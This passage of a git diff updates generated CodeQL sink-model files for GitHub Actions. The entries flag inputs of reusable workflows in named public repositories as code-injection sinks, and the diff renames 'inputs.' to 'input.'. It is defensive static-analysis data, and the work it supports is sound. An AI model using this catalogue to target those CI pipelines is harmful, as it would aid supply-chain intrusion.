"code-injection", "generated"] - - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.working-directory", "code-injection", "generated"] \ No newline at end of file + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.wave-app-name", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.working-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index d62c86e1129..c74922e61dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.dry-run", "code-injection", "generated"] - - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 8aedf9000a0..169094c3eb3 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "inputs.artifact-name", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index b14f14538b8..6e4e4f4f1e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.package-names-command", "code-injection", "generated"] - - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.go-test-flags", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index 3129cac8979..dbc26ef9f04 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "inputs.package", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitUser", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitEmail", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.providerFqn", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelConversionsPerDocument", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelFileConversions", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.languages", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.cdktfRegistryDocsVersion", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.files", "code-injection", "generated"] - - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.maxRunners", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitUser", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitEmail", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.providerFqn", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.parallelConversionsPerDocument", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.parallelFileConversions", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.languages", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.cdktfRegistryDocsVersion", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.files", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.maxRunners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index a23f69909c7..c69de7cfcc2 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "inputs.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index cd91f58c7ec..685b0b144c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.product-version", "code-injection", "generated"] - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.package-name", "code-injection", "generated"] - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goarch", "code-injection", "generated"] - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.package-name", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.goarch", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index d8be4cc11b9..9e3fc5cdc4f 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -3,17 +3,17 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-max", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-name", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-edition", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-version", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.vault-edition", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.vault-version", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.go-arch", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.binary-tests", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index ad0943c3040..4cd6cd8f591 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "inputs.isStableRelease", "code-injection", "generated"] - - ["heroku/cli/.github/workflows/promote.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] + - ["heroku/cli/.github/workflows/promote.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index e8c98ab4576..01726410e18 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.project_name", "code-injection", "generated"] - - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 00b45b50f88..90e61bcf11a 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] + - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index a5f35f3b737..b4e1ff8155a 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.windowsBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.bazelBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.iosBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.macosBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.androidBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.bazelBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.iosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.macosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.androidBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index d0559519627..3621105b74e 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.package_name", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.hub_base_path", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.pr_number", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.commit_sha", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.languages", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.version_tag_suffix", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.additional_args", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] \ No newline at end of file + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.hub_base_path", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.pr_number", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.commit_sha", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.languages", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.version_tag_suffix", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.additional_args", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index ec7b51abd8e..b6660df1c9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.folder_slices", "code-injection", "generated"] - - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.setup_status", "code-injection", "generated"] \ No newline at end of file + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index 92fd43bda75..ead0bcfab16 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.qt_version", "code-injection", "generated"] - - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.event_name", "code-injection", "generated"] \ No newline at end of file + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.qt_version", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.event_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index ca550e4ddd7..6f9a12e9069 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ibm/sarama/.github/workflows/fvt.yml", "*", "inputs.kafka-version", "code-injection", "generated"] \ No newline at end of file + - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 580ac8bef0b..8ac32e4a7b7 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "inputs.icloudpd_version", "code-injection", "generated"] \ No newline at end of file + - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 463536e9693..3c21fcad386 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file + - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index 57bf30dc0cc..e0d2508932f 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "inputs.release-script-to-run", "code-injection", "generated"] \ No newline at end of file + - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index b7e49d46e1c..96830183506 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "inputs.image_tag", "code-injection", "generated"] \ No newline at end of file + - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 89257a02fcd..7f9299eb4d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "inputs._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file + - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index a645511766b..7a79d4c1e09 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index 1a7784c9f01..55888f48551 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "inputs.gradleVersion", "code-injection", "generated"] \ No newline at end of file + - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index ffb7a7d7d10..ea453ec4811 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.platform", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index 4ae93a83cd8..39005b693e7 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -3,21 +3,21 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.family", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "inputs.flavor", "code-injection", 